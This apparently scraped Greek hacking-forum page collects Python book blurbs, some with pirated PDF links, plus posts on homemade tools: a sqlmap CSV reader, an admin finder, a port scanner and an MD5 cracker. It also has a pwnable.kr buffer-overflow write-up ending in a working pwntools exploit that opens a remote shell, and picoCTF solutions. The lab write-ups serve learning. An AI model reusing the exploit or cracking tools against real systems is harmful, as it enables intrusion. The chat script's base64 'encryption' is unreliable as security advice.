This book will show you how to use Python, create your own hacking tools, and make the most out of available resources that are made using this programming language. If you do not have experience in programming, don’t worry – this book will show guide you through understanding the basic concepts of programming and navigating Python codes. This book will also serve as your guide in understanding common hacking methodologies and in learning how different hackers use them for exploiting vulnerabilities or improving security. You will also be able to create your own hacking scripts using Python, use modules and libraries that are available from third-party sources, and learn how to tweak existing hacking scripts to address your own computing needs. Hacking with Python The Ultimate Beginners Guide - Steve Tale.pdf

Chapters Getting started with Python Language Python Data Types Indentation Comments and Documentation Date and Time Date Formatting Enum Set Simple Mathematical Operators Bitwise Operators Boolean Operators Operator Precedence Variable Scope and Binding Conditionals Comparisons Loops Arrays Multidimensional arrays Dictionary List List comprehensions List slicing (selecting parts of lists) groupby() Linked lists Linked List Node Filter Heapq Tuple Basic Input and Output Files & Folders I/O os.path Iterables and Iterators Functions Defining functions with list arguments Functional Programming in Python Partial functions Decorators Classes Metaclasses String Formatting String Methods Using loops within functions Importing modules Difference between Module and Package Math Module Complex math Collections module Operator module JSON Module Sqlite3 Module The os Module The locale Module Itertools Module Asyncio Module Random module Functools Module The dis module The base64 Module Queue Module Deque Module Webbrowser Module tkinter pyautogui module Indexing and Slicing Plotting with Matplotlib graph-tool Generators Reduce Map Function Exponentiation Searching Sorting, Minimum and Maximum Counting The Print Function Regular Expressions (Regex) Copying data Context Managers (“with” Statement) The __name__ special variable Checking Path Existence and Permissions Creating Python packages Usage of "pip" module: PyPI Package Manager pip: PyPI Package Manager Parsing Command Line arguments Subprocess Library setup.py Recursion Type Hints Exceptions Raise Custom Errors / Exceptions Commonwealth Exceptions urllib Web scraping with Python HTML Parsing Manipulating XML Python Requests Post Distribution Property Objects Overloading Polymorphism Method Overriding User-Defined Methods String representations of class instances: __str__ and __repr__ methods Debugging Reading and Writing CSV Writing to CSV from String or List Dynamic code execution with `exec` and `eval` PyInstaller - Distributing Python Code Data Visualization with Python The Interpreter (Command Line Console) *args and **kwargs Garbage Collection Pickle data serialisation Binary Data Idioms Data Serialization Multiprocessing Multithreading Processes and Threads Python concurrency Parallel computation Sockets Websockets Sockets And Message Encryption/Decryption Between Client and Server Python Networking Python HTTP Server Flask Introduction to RabbitMQ using AMQPStorm Descriptor tempfile NamedTemporaryFile Input, Subset and Output External Data Files using Pandas Unzipping Files Working with ZIP archives Getting start with GZip Stack Working around the Global Interpreter Lock (GIL) Deployment Logging Web Server Gateway Interface (WSGI) Python Server Sent Events Alternatives to switch statement from other languages List destructuring (aka packing and unpacking) Accessing Python source code and bytecode Mixins Attribute Access ArcPy Abstract Base Classes (abc) Plugin and Extension Classes Immutable datatypes(int, float, str, tuple and frozensets) Incompatibilities moving from Python 2 to Python 3 2to3 tool Non-official Python implementations Abstract syntax tree Unicode and bytes Python Serial Communication (pyserial) Neo4j and Cypher using Py2Neo Basic Curses with Python Templates in python Pillow The pass statement CLI subcommands with precise help output Database Access Connecting Python to SQL Server PostgreSQL Python and Excel Turtle Graphics Python Persistence Design Patterns hashlib Creating a Windows service using Python Mutable vs Immutable (and Hashable) in Python configparser Optical Character Recognition Virtual environments Python Virtual Environment - virtualenv Virtual environment with virtualenvwrapper Create virtual environment with virtualenvwrapper in windows sys ChemPy - python package pygame Pyglet Audio pyaudio shelve IoT Programming with Python and Raspberry PI kivy - Cross-platform Python Framework for NUI Development Pandas Transform: Preform operations on groups and concatenate the results Similarities in syntax, Differences in meaning: Python vs. JavaScript Call Python from C# ctypes Writing extensions Python Lex-Yacc Unit Testing py.test Profiling Python speed of program Performance optimization Security and Cryptography Secure Shell Connection in Python Python Anti-Patterns Common Pitfalls Hidden Features PythonNotesForProfessionals.pdf

Key Features Second edition of the bestselling book on Machine Learning A practical approach to key frameworks in data science, machine learning, and deep learning Use the most powerful Python libraries to implement machine learning and deep learning Get to know the best practices to improve and optimize your machine learning systems and algorithms Book Description Machine learning is eating the software world, and now deep learning is extending machine learning. Understand and work at the cutting edge of machine learning, neural networks, and deep learning with this second edition of Sebastian Raschka's bestselling book, Python Machine Learning. Thoroughly updated using the latest Python open source libraries, this book offers the practical knowledge and techniques you need to create and contribute to machine learning, deep learning, and modern data analysis. Fully extended and modernized, Python Machine Learning Second Edition now includes the popular TensorFlow deep learning library. The scikit-learn code has also been fully updated to include recent improvements and additions to this versatile machine learning library. Sebastian Raschka and Vahid Mirjalili's unique insight and expertise introduce you to machine learning and deep learning algorithms from scratch, and show you how to apply them to practical industry challenges using realistic and interesting examples. By the end of the book, you'll be ready to meet the new data analysis opportunities in today's world. If you've read the first edition of this book, you'll be delighted to find a new balance of classical ideas and modern insights into machine learning. Every chapter has been critically updated, and there are new chapters on key technologies. You'll be able to learn and work with TensorFlow more deeply than ever before, and get essential coverage of the Keras neural network library, along with the most recent updates to scikit-learn. What you will learn Understand the key frameworks in data science, machine learning, and deep learning Harness the power of the latest Python open source libraries in machine learning Explore machine learning techniques using challenging real-world data Master deep neural network implementation using the TensorFlow library Learn the mechanics of classification algorithms to implement the best tool for the job Predict continuous target outcomes using regression analysis Uncover hidden patterns and structures in data with clustering Delve deeper into textual and social media data using sentiment analysis Table of Contents Giving Computers the Ability to Learn from Data Training Simple Machine Learning Algorithms for Classification A Tour of Machine Learning Classifiers Using Scikit-Learn Building Good Training Sets - Data Preprocessing Compressing Data via Dimensionality Reduction Learning Best Practices for Model Evaluation and Hyperparameter Tuning Combining Different Models for Ensemble Learning Applying Machine Learning to Sentiment Analysis Embedding a Machine Learning Model into a Web Application Predicting Continuous Target Variables with Regression Analysis Working with Unlabeled Data - Clustering Analysis Implementing a Multilayer Artificial Neural Network from Scratch Parallelizing Neural Network Training with TensorFlow Going Deeper - The Mechanics of TensorFlow Classifying Images with Deep Convolutional Neural Networks Modeling Sequential Data using Recurrent Neural Networks Python Machine Learning - Second Edition Machine Learning and Deep Learning with Python, scikit-learn, and TensorFlow (English Edition) by Sebastian Raschka, Vahid Mirjalili.pdf

Pastebin: https://pastebin.com/ftwc9MYd Κωδικός pastebin: jKy3kqJ8nA Αυτο το πρόγραμμα είναι χρήσιμο για να διαβάσει τα αποτελέσματα του sqlmap καθώς και άλλων προγραμμάτων που κάνουν εξαγωγή σε csv. Parameters: -p / --path , -c / --column Χρήση: ./csv_reader.py -p file.csv --example 1 ./csv_reader.py --path file.csv --column email,password --example 2 virustotal, csv_reader.py

[CYBER SECURITY && ETHICAL HACKING] ################################# Ίσως το καλύτερο πρόγραμμα που έχω φτιάξει. Είναι ένα πρόγραμμα σε όλα. Τι εννοώ; Ο χρήστης έχει το δικαίωμα να επιλέξει τι θέλει να χρησιμοποιήσει από όλα τα προγράμματα που έχω φτιάξει μαζί. Όπως ακριβώς βλέπουμε στην πρώτη εικόνα. ####################################### 1 ==> Subdomain Finder 2 ==> Admin Login Finder 3 ==> Port Scanner 4 ==> Password Generator 5 ==> Proxy List 6 ==> MD5 Cracker 0 ==> Exit. ####################################### Χρήση ####### Η χρήση του είναι επίσης πολύ απλή. Απλά επιλέγουμε τον κατάλληλο αριθμό που αντιστοιχεί με το πρόγραμμα που θέλουμε να χρησιμοποιήσουμε και έπειτα ακολουθούμε τις οδηγίες των προγραμμάτων. Πρέπει αναγκαστικά να έχετε κατεβασμένη στον υπολογιστή σας την Python για να το χρησιμοποιήσετε. INSTALL ########## cd greekhacking pip install -r requirements python greekhacking.py Download ######### Mediafire: https://www.mediafire.com/.../bqti1.../greekhacking.rar/file GitHub: https://github.com/MataGreek/greekhacking

Καλησπέρα στον κόσμο του φόρουμ μας Σήμερα θα ήθελα να σας παρουσιάσω ένα πρόγραμμα που έφτιαξα με την γλώσσα Python και αυτό είναι ένα από Port Scanner. Τι κάνει το Port Scanner? Σκανάρει για ανοιχτές πόρτες ή θύρες (όπως θέλετε πείτε το) ενός Website. Πάμε να δούμε πως λειτουργεί λοιπόν. Αρχικά θα σας βάλω σε Screenshot το σκαν που έκανε το VirusTotal για να σας επαληθεύσω ότι δεν έβαλα μέσα κάποιον ιό. Ωραία. Τώρα που το επαληθεύσαμε πάμε να ξεκινήσουμε. Για αρχή, να πω ότι ο οδηγός είναι πάρα πολύ απλός και δεν χρειάζεται να κάνετε απολύτως τίποτα παρά μόνο να γράψετε αυτήν την εντολή "python3 GHPortScanner.py" Αφού όμως έχετε μπει στους σωστούς φακέλους οι οποίοι είναι "cd GHPortScanner/" και "cd GHPortScanner-v1.1" Με το που ανοίξει το πρόγραμμα θα σας εμφανίσει το "Enter the Host Here:" Εσείς εκεί θα βάλετε το Website το οποίο θέλετε να σκανάρετε. (Όχι την IP, βάλτε απλά το όνομα της ιστοσελίδας) Ας πάρουμε παράδειγμα το φόρουμ μας. Βλέπουμε ότι μας έχει βρει την IP της ιστοσελίδας που βάλαμε η οποία είναι 172.67.177.36 και περιττώ να πω ότι εδώ υπάρχει ένα προβληματάκι το οποίο μακάρι να το έχω λύσει στο επόμενο Version του προγράμματος... Είναι ΑΡΚΕΤΑ αργό στο να βρεί τα αποτελέσματα ανοιχτών Port. Συγγνώμη γι αυτό θα βρω τον τρόπο. Οπότε... Will take sometime, go get a coffee Βλέπουμε ότι βρήκε ανοιχτή την πόρτα 80. Εκεί το σταμάτησα γιατί το άνοιξα μόνο και μόνο για να σας δείξει πως λειτουργεί. Αν θέλετε να βγείτε από το πρόγραμμα, πατήστε απλά CTRL+C και αμέσως θα σας εμφανίσει την λέξει Exiting...... Που σημαίνει ότι το πρόγραμμα τερματίζεται. Το πρόγραμμα μπορείτε να το κατεβάσετε από το Github αλλά θα σας έχω και αρχείο στο MediaFire. Ευχαριστώ Για οποιοδήποτε πρόβλημα προκήψει, μην διστάσετε να γράψετε σχόλιο. Mediafire Download: https://www.mediafire.com/file/lkp6zrh1iodn7v9/GHPortScanner.zip/file Github Download: https://github.com/MataGreek/GHPortScanner command για να το κατεβάσετε σε Linux... git clone https://github.com/MataGreek/GHPortScanner.git ΠΡΟΣΟΧΗ: ΝΑ ΒΑΖΕΤΕ ΤΟ ΣΩΣΤΟ HOST NAME ΚΑΙ ΝΑ ΕΧΕΤΕ ΣΥΝΔΕΣΗ ΤΟ ΙΝΤΕΡΝΕΤ ΑΛΛΙΩΣ ΤΟ ΠΡΟΓΡΑΜΜΑ ΔΕΝ ΘΑ ΛΕΙΤΟΥΡΓΗΣΕΙ ΚΑΙ ΘΑ ΣΑΣ ΠΕΤΑΞΕΙ ΑΥΤΟ ΤΟ ΜΗΝΥΜΑ: "Error: Could not find the HOST. (Check your internet connection or your input is wrong)"

εχω φτιαξει ενα private chat με python ολα τα logs ειναι σε ενα webserver που επικοινωνει το προγραμμα ....στον webserver ολα ειναι encrypted σε ενα txt file...για να παρει το προγραμμα το file κανει ενα get request σε ενα php file ston server οπου με custom header ως κωδικος σου δινει το file ωστε να γινει decrypt και να το δει το προγραμμα...για post request ωστε να στειλεις μυνημα ειναι ενα απλο log in panel που στελνεις ψευδονημο και το μυνημα που θελεις... import requests import os import base64 from inputimeout import inputimeout,TimeoutOccurred def encryption(text): messageto = text message_bytes = messageto.encode('ascii') base64_bytes = base64.b64encode(message_bytes) base64message = base64_bytes.decode('ascii') return base64message def decrypt(text): messageto = text base64_bytes = messageto.encode('ascii') message_bytes = base64.b64decode(base64_bytes) base64message = message_bytes.decode('ascii') return base64message def custom_encryption(text): text=list(text) text1='' for i in text: text1=i+text1 text1=list(text1) text1[0],text1[len(text)-1]=text1[len(text1)-1],text1[0] text1[1],text1[len(text)-2]=text1[len(text1)-2],text1[1] text2='' for i in text1: text2+=i text2='=====en'+text2+'de=====' return text2 def custom_decrypt(text): text=list(text) text1=text[7:] text1=text1[:-7] text2='' for i in text1: text2=i+text2 text2=list(text2) text2[0],text2[len(text2)-1]=text2[len(text2)-1],text2[0] text2[1],text2[len(text2)-2]=text2[len(text2)-2],text2[1] text3='' for i in text2: text3+=i return(text3) def chat(): os.system('cls') print() print('-----------------------HACKER ZONE-----------------------') s=requests.get('' , headers=headers) #php file in webserver here file=s.text.split("\n") for i in range(len(file)-1): line=file[i].split(":") x=custom_decrypt(line[0]) y=custom_decrypt(line[1]) ln1=decrypt(x) ln2=decrypt(y) print(ln1+':'+ln2) os.system('cls') headers = {'user-agent':''} #PASSWORD HERE username=input('your username : ') while username=='' or username==':' or username=='\n': username=input('try again username : ') username=encryption(username) username=custom_encryption(username) log=encryption('Log in') log=custom_encryption(log) data={'username':username,'message':log,'submit':'Log in'} log = requests.post('',data=data)#log in in web here answer='' while answer!='stop': if answer=='write': message=input('write message : ') while message=='' or message==':' : message=input('write message again: ') message=encryption(message) message=custom_encryption(message) datas={'username':username,'message':message,'submit':'Log in'} s=requests.post('',data=datas)#log in in web here chat() chat() print('------------------------------------------------------') try: answer = inputimeout(prompt='write/stop : ', timeout=5) while answer=='' or answer==':' : answer = inputimeout(prompt='try again write/stop : ', timeout=5) except TimeoutOccurred: chat() print('------------------------------------------------------') answer='' θα αλαξετε τα εξης(προσθετετε αναμεσα απο τα αυτακια ' ' 😞 1)στο ( s=requests.get('' , headers=headers) #php file in webserver here ) βαζουμε το php file tou server πχ www.example.com/phpfile.php 2)στο ( headers = {'user-agent':''} #PASSWORD HERE ) βαζουμε εναν κωδικο 3)στο ( log = requests.post('',data=data)#log in in web here ) βαζουμε το html file που θα κανουμε log in στον webserver 4)να κατεβασετε με την χρηση του pip τα libraries base64 και requests <html> <head> <title>php chat</title> </head> <body> <?php if (isset($_POST['submit'])){ $file = fopen("chat.txt",'a+'); $text=$_POST['username'] . ':' . $_POST['message'] . "\n"; fwrite($file,$text); fclose($file); } ?> <form action='' method="POST"> <P>username: <input type="text" name ="username" value=""> <P>message: <input type="text" name ="message" value=""></p> <input type="submit" name="submit" value="Log in"> </form> </body> </html> εδω θα γινοντε τα post requests απο το python script βαλτε το στο webserver px http://example.com/post.html (αυτο θα βαλετε και στο python script στο 3 πχ log = requests.post('http://example.com/post.html',data=data)#log in in web here) επισης δημιουργηστε ενα txt file στον webserver που να λεγεται chat.txt αδιο <?php if (isset($_SERVER["HTTP_USER_AGENT"])) { $ua = $_SERVER["HTTP_USER_AGENT"]; if ($ua == "PASSWORD") { $f = fopen("chat.txt", "r"); echo fread($f, filesize("chat.txt")); fclose($f); } else if (strstr($ua, "Windows") || strstr($ua, "Linux")) { echo "<h1>Nice try skiddo</h1><style>body { background: #000; animation: sosi 69ms linear infinite; } @keyframes sosi { 20% { background: red; } 40% { background: blue; } 60% { background: green; } 80% { background: white; }}</style>"; } } else { echo "No access!"; } ?> αυτο ειναι το php script στον webserve που στην θεση του PASSWORD στο line 4 βαλτε τον κωδικο που βαλατε και στο python script στο 2 τελος βαλτε στο python script στο 1 την θεση του php πχ s=requests.get('http://example.com/get.php' , headers=headers) #php file in webserver here είστε έτοιμοι να το τρέξετε....Για ευκολία ή ακομα και δοκιμη σας προτεινω να το hostarete σε ενα free server οπως biz.nf Ο filamanager θα μοιαζει καπως ετσi: και το script καπως ετσι: Για οποιαδηποτε απορια η καποιο λαθος που εχω κανει παρακαλω ενημερωστε με....

Ένα βιβλίο που αξίζει να το διαβάσει κάποιος αρχάριος για να μάθει μερικές από τις βασικές δυνατότητες της γλώσσας [hide] https://www.sendspace.com/file/esvald [/hide] Programming.Python.4th.Edition.pdf

Καλησπέρα, μπορεί αυτός ο οδηγός να είναι λίγο πιο "advanced", οπότε θα προσπαθήσω να το αναλύσω όσο πιο πολύ μπορώ. Βρήκα ένα πολύ ενδιαφέρον BOF task στο pwnable.kr το όπιο είναι λιγάκι πιο tricky. Δεν έχει να κάνει με shellcode execution κτλπ είναι ένα απλό buffer με ένα comparison. Επίσης θα κάνουμε μια μικρή εισαγωγή στα pwntools & θα δημιουργήσουμε το δικό μας PoC! Περιεχόμενα : 0x01 Binary Enumeration 0x02 Exploitation + PoC [hide] 0x01 Binary Enumeration Μας δίνει το vulnerable binary, το source code & τον server:port που τρέχει το vulnerable binary. Οπότε το payload μας θα πρέπει να το στείλουμε στο pwnable.kr:9000. Ας κατεβάσουμε τα αρχεία αρχικά. [root@pwn4magic]:~/Desktop/bof# wget -q http://pwnable.kr/bin/bof [root@pwn4magic]:~/Desktop/bof# wget -q http://pwnable.kr/bin/bof.c [root@pwn4magic]:~/Desktop/bof# ls -la total 20 drwxr-xr-x 2 root root 4096 Dec 26 13:15 . drwxr-xr-x 18 root root 4096 Dec 25 19:35 .. -rw-r--r-- 1 root root 7348 May 16 2019 bof -rw-r--r-- 1 root root 308 May 16 2019 bof.c [root@pwn4magic]:~/Desktop/bof# Ας δούμε τώρα τι τύπος αρχείου είναι. [root@pwn4magic]:~/Desktop/bof# file bof bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped x86 binary. Ας το τρέξουμε το αρχείο και ας δοκιμάσουμε να στείλουμε μεγάλο input. [root@pwn4magic]:~/Desktop/bof# chmod +x bof [root@pwn4magic]:~/Desktop/bof# ./bof overflow me : n4ckhcker Nah.. [root@pwn4magic]:~/Desktop/bof# python -c 'print "A" * 100' | ./bof overflow me : Nah.. *** stack smashing detected ***: <unknown> terminated Aborted Ωραία να δούμε το source code τώρα. #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } Έχουμε 2 functions την main() και την func(). Πρέπει να κάνουμε focus στην func(), αρχικά έχουμε ένα buffer 32bytes και μας λέει άμα το key == 0xcafebabe θα μας δώσει shell (/bin/sh). Η gets() είναι η vulnerable function γιατί δεν τσεκάρει το buffer length. Ας το κάνουμε load στο PEDA (Python Exploit Development Assistance - https://github.com/longld/peda). [root@pwn4magic]:~/Desktop/bof# gdb -q bof Reading symbols from bof... (No debugging symbols found in bof) gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x00000474 _init 0x000004c0 gets@plt 0x000004d0 __stack_chk_fail@plt 0x000004e0 __cxa_finalize@plt 0x000004f0 puts@plt 0x00000500 system@plt 0x00000510 __gmon_start__@plt 0x00000520 __libc_start_main@plt 0x00000530 _start 0x00000570 __do_global_dtors_aux 0x000005f0 frame_dummy 0x00000627 __i686.get_pc_thunk.bx 0x0000062c func 0x0000068a main 0x000006b0 __libc_csu_init 0x00000720 __libc_csu_fini 0x00000730 __do_global_ctors_aux 0x00000768 _fini gdb-peda$ Μπορούμε να δούμε τα functions, func() & main(). Ας κάνουμε disassemble το func. gdb-peda$ set disassembly-flavor intel gdb-peda$ disassemble func Dump of assembler code for function func: 0x5655562c <+0>: push ebp 0x5655562d <+1>: mov ebp,esp 0x5655562f <+3>: sub esp,0x48 0x56555632 <+6>: mov eax,gs:0x14 0x56555638 <+12>: mov DWORD PTR [ebp-0xc],eax 0x5655563b <+15>: xor eax,eax 0x5655563d <+17>: mov DWORD PTR [esp],0x78c 0x56555644 <+24>: call 0x56555645 <func+25> 0x56555649 <+29>: lea eax,[ebp-0x2c] 0x5655564c <+32>: mov DWORD PTR [esp],eax 0x5655564f <+35>: call 0x56555650 <func+36> 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe 0x5655565b <+47>: jne 0x5655566b <func+63> 0x5655565d <+49>: mov DWORD PTR [esp],0x79b 0x56555664 <+56>: call 0x56555665 <func+57> 0x56555669 <+61>: jmp 0x56555677 <func+75> 0x5655566b <+63>: mov DWORD PTR [esp],0x7a3 0x56555672 <+70>: call 0x56555673 <func+71> 0x56555677 <+75>: mov eax,DWORD PTR [ebp-0xc] 0x5655567a <+78>: xor eax,DWORD PTR gs:0x14 0x56555681 <+85>: je 0x56555688 <func+92> 0x56555683 <+87>: call 0x56555684 <func+88> 0x56555688 <+92>: leave 0x56555689 <+93>: ret End of assembler dump. gdb-peda$ Μπορούμε να δούμε το cmp instruction : 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe Ας βάλουμε ένα breakpoint εδώ & ας δημιουργήσουμε ένα 100bytes pattern. gdb-peda$ break *0x56555654 Breakpoint 1 at 0x56555654 gdb-peda$ pattern create 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: /root/Desktop/bof/bof overflow me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL [----------------------------------registers-----------------------------------] EAX: 0xffffd1bc ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EBX: 0x0 ECX: 0xf7fad5c0 --> 0xfbad2288 EDX: 0xf7faf01c --> 0x0 ESI: 0xf7fad000 --> 0x1d6d6c EDI: 0xf7fad000 --> 0x1d6d6c EBP: 0xffffd1e8 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") ESP: 0xffffd1a0 --> 0xffffd1bc ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EIP: 0x56555654 (<func+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe) EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) Ας κάνουμε display τo memory content του ebp+0x8 στον EIP register. Ο ebp register κάνει track που είναι το stack. gdb-peda$ x/s $ebp+0x8 0xffffd1f0: "AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL" gdb-peda$ pattern offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 52 gdb-peda$ 0x02 Exploitation + PoC Έχουμε το offset μπορούμε να φτιάξουμε το PoC μας τώρα. Τα pwntools σου κάνουν την ζωή εύκολη με λίγα λόγια, είναι ένα exploit development library για περισσότερα : https://github.com/Gallopsled/pwntools PoC : #!/usr/bin/env python from pwn import * sock = remote('pwnable.kr', 9000) #kanoyme connection ston vulnerable server payload = "A" * 52 + p32(0xcafebabe) #to payload mas offset 52bytes + se little endian to address sock.sendline(payload) #stelnoyme to payload ston server sock.interactive() #mas dinei shell Ας το τρέξουμε. [root@pwn4magic]:~/Desktop/bof# chmod +x exploit.py [root@pwn4magic]:~/Desktop/bof# ./exploit.py [+] Opening connection to pwnable.kr on port 9000: Done [*] Switching to interactive mode $ whoami bof $ ls bof bof.c flag log log2 super.pl $ cat flag daddy, I just pwned a buFFer :) $ Για ότι απορίες στείλτε μου DM. [/hide]

Η παρούσα διπλωματική εργασία επικεντρώνεται στην εξέταση του ελέγχου διείσδυσης για την αξιολόγηση της ασφάλειας ενός εξυπηρετητή παγκοσμίου ιστού σε επιθέσεις και συγκεκριμένα στην υλοποίηση ενός ρεαλιστικού περιβάλλοντος ελέγχου διείσδυσης για εκπαιδευτικούς λόγους. Η υλοποίηση γίνεται με τη δημιουργία μιας σκόπιμα ευάλωτης εικονικής μηχανής. Χρησιμοποιείται η γλώσσα Python και το Django Framework για τη δημιουργία ευάλωτων εφαρμογών ως σεναρίων προς επίλυση. Οι κίνδυνοι ασφαλείας που συμπεριλαμβάνονται στα σενάρια είναι οι Broken Authentication, XSS, SQL Injection, Buffer Overflow 32-bit και 64-bit. Η διεπαφή έχει τη μορφή ενός εκπαιδευτικού παιχνιδιού ανάκτησης σημαίας (CTF). Ασφάλεια σε επιθέσεις εξυπηρετητών παγκοσμίου ιστού - Νικόλαος Τζίρης Γεωργόπουλους.pdf Πηγή: Νημερτής

Καλησπέρα, ένα άλλο πολύ ενδιαφέρον CTF είναι το Pico. Το PicoCTF είναι beginner-friendly ξεκινάει με πολύ βασικά tasks & και φτάνει σε advanced tasks. Υπάρχουν οι παρακάτω κατηγορίες : Forensics General Skills Reversing Cryptography Web Exploitation Binary Exploitation Υπάρχει του 2018 που είναι ακόμα live και του 2019. Εμείς θα αρχίσουμε με του 2018, αρχικά με την κατηγορία General Skills, βασικός προγραμματισμός / linux cmds κτλπ. Τα challenges που θα λύσουμε : General Warmup 1 General Warmup 2 General Warmup 3 Resources grep 1 net cat Θα σας έχω links στο τέλος για παραπάνω πληροφορίες. General Warmup 1 [hide] Έχουμε να κάνουμε convert hex -> ASCII , προσωπικά μου αρέσει να χρησιμοποιώ την python. >>> print "41".decode("hex") A Με το flag format : picoCTF{A} General Warmup 2 Οπότε έχουμε να κάνουμε convert base 10 -> base 2. >>> bin(27) '0b11011' Χωρίς το 0b : picoCTF{11011} General Warmup 3 Τώρα πάμε σε base 16 -> base 10 >>> int("0x3D",16) 61 Flag : picoCTF{61} Resources Πολύ απλό challenge, απλά πάμε στο link https://picoctf.com/resources και διαβάζουμε το flag ή με το curl. curl https://picoctf.com/resources | grep "picoCTF{" <li><code class="highlighter-rouge">picoCTF{r3source_pag3_f1ag}</code> (2019 competition)</li> <li><code class="highlighter-rouge">picoCTF{xiexie_ni_lai_zheli}</code> (2018 competition)</li> Flag : picoCTF{xiexie_ni_lai_zheli} grep 1 Αρχικά θα κατεβάσουμε το αρχείο & έπειτα θα χρησιμοποιήσουμε το grep για να βρούμε το flag. wget --no-check-certificate -q https://2018shell.picoctf.com/static/f2e1fdcd5c405ca4170af1a8973b365b/file cat file | grep picoCTF picoCTF{grep_and_you_will_find_d66382d8} Flag : picoCTF{grep_and_you_will_find_d66382d8} net cat Πολύ απλά πρέπει να συνδεθούμε στο 2018shell.picoctf.com & 22847. nc 2018shell.picoctf.com 22847 That wasn't so hard was it? picoCTF{NEtcat_iS_a_NEcESSiTy_69222dcc} Flag : picoCTF{NEtcat_iS_a_NEcESSiTy_69222dcc} Είναι πολλά, θα τα πάρουμε κομμάτι - κομμάτι. Αυτά για τώρα τα λέμε στον επόμενο οδηγό. Links grep : https://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/ netcat : https://netsec.ws/?p=292 [/hide]

Καλησπερα το παρακατω βιβλιο ειναι το μονο βιβλιο για python στα ελληνικα το οποιο εκτος απο τα κλασσικα κομματια που καλυπτουν ολα τα βιβλια για python, δομες, αρχεια, αντικειμενοστρεφης κτλ. καλυπτει sockets και distributed systems. Βεβαια για πιο αναλυτικα τα 2 τελευταια θα πρεπει να τα διαβασεται σε ξενα βιβλια που αφιερωνουν απειρες σελιδες πανω σε αυτα τα θεματα. Don't forget to share the magic of open source. https://repository.kallipos.gr/pdfviewer/web/viewer.html?file=/bitstream/11419/1708/1/85_Magoutis.pdf

Master Python scripting to build a network and perform security operations Key Features Learn to handle cyber attacks with modern Python scripting Discover various Python libraries for building and securing your network Understand Python packages and libraries to secure your network infrastructure Book Description It's becoming more and more apparent that security is a critical aspect of IT infrastructure. A data breach is a major security incident, usually carried out by just hacking a simple network line. Increasing your network's security helps step up your defenses against cyber attacks. Meanwhile, Python is being used for increasingly advanced tasks, with the latest update introducing many new packages. This book focuses on leveraging these updated packages to build a secure network with the help of Python scripting. This book covers topics from building a network to the different procedures you need to follow to secure it. You'll first be introduced to different packages and libraries, before moving on to different ways to build a network with the help of Python scripting. Later, you will learn how to check a network's vulnerability using Python security scripting, and understand how to check vulnerabilities in your network. As you progress through the chapters, you will also learn how to achieve endpoint protection by leveraging Python packages along with writing forensic scripts. By the end of this book, you will be able to get the most out of the Python language to build secure and robust networks that are resilient to attacks. What you will learn Develop Python scripts for automating security and pentesting tasks Discover the Python standard library's main modules used for performing security-related tasks Automate analytical tasks and the extraction of information from servers Explore processes for detecting and exploiting vulnerabilities in servers Use network software for Python programming Perform server scripting and port scanning with Python Identify vulnerabilities in web applications with Python Use Python to extract metadata and forensics Who this book is for This book is ideal for network engineers, system administrators, or any security professional looking at tackling networking and security challenges. Programmers with some prior experience in Python will get the most out of this book. Some basic understanding of general programming structures and Python is required. Table of Contents Working with Python Scripting System Programming Packages Socket Programming HTTP Programming Analyzing Network Traffic Gathering Information from Servers Interacting with FTP ,SSH and SNMP Servers Working with Nmap Scanners Connecting with Metasploit Framework Interacting with Vulnerabilities Scanner Identifying Server Vulnerabilities in Web Applications Extracting Geolocation and Metadata from Documents,Images and Browsers Cryptography and Steganography Assessments Mastering Python for Networking and Security Leverage Python scripts and libraries to overcome networking and security issues by Jose Manuel Ortega.pdf

Your guide to the functional programming paradigm Functional programming mainly sees use in math computations, including those used in Artificial Intelligence and gaming. This programming paradigm makes algorithms used for math calculations easier to understand and provides a concise method of coding algorithms by people who aren't developers. Current books on the market have a significant learning curve because they're written for developers, by developers—until now. Functional Programming for Dummies explores the differences between the pure (as represented by the Haskell language) and impure (as represented by the Python language) approaches to functional programming for readers just like you. The pure approach is best suited to researchers who have no desire to create production code but do need to test algorithms fully and demonstrate their usefulness to peers. The impure approach is best suited to production environments because it's possible to mix coding paradigms in a single application to produce a result more quickly. Functional Programming For Dummies uses this two-pronged approach to give you an all-in-one approach to a coding methodology that can otherwise be hard to grasp. Learn pure and impure when it comes to coding Dive into the processes that most functional programmers use to derive, analyze and prove the worth of algorithms Benefit from examples that are provided in both Python and Haskell Glean the expertise of an expert author who has written some of the market-leading programming books to date If you’re ready to massage data to understand how things work in new ways, you’ve come to the right place! Functional Programming For Dummies (For Dummies (ComputerTech)) 1st Edition by John Paul Mueller.Pdf

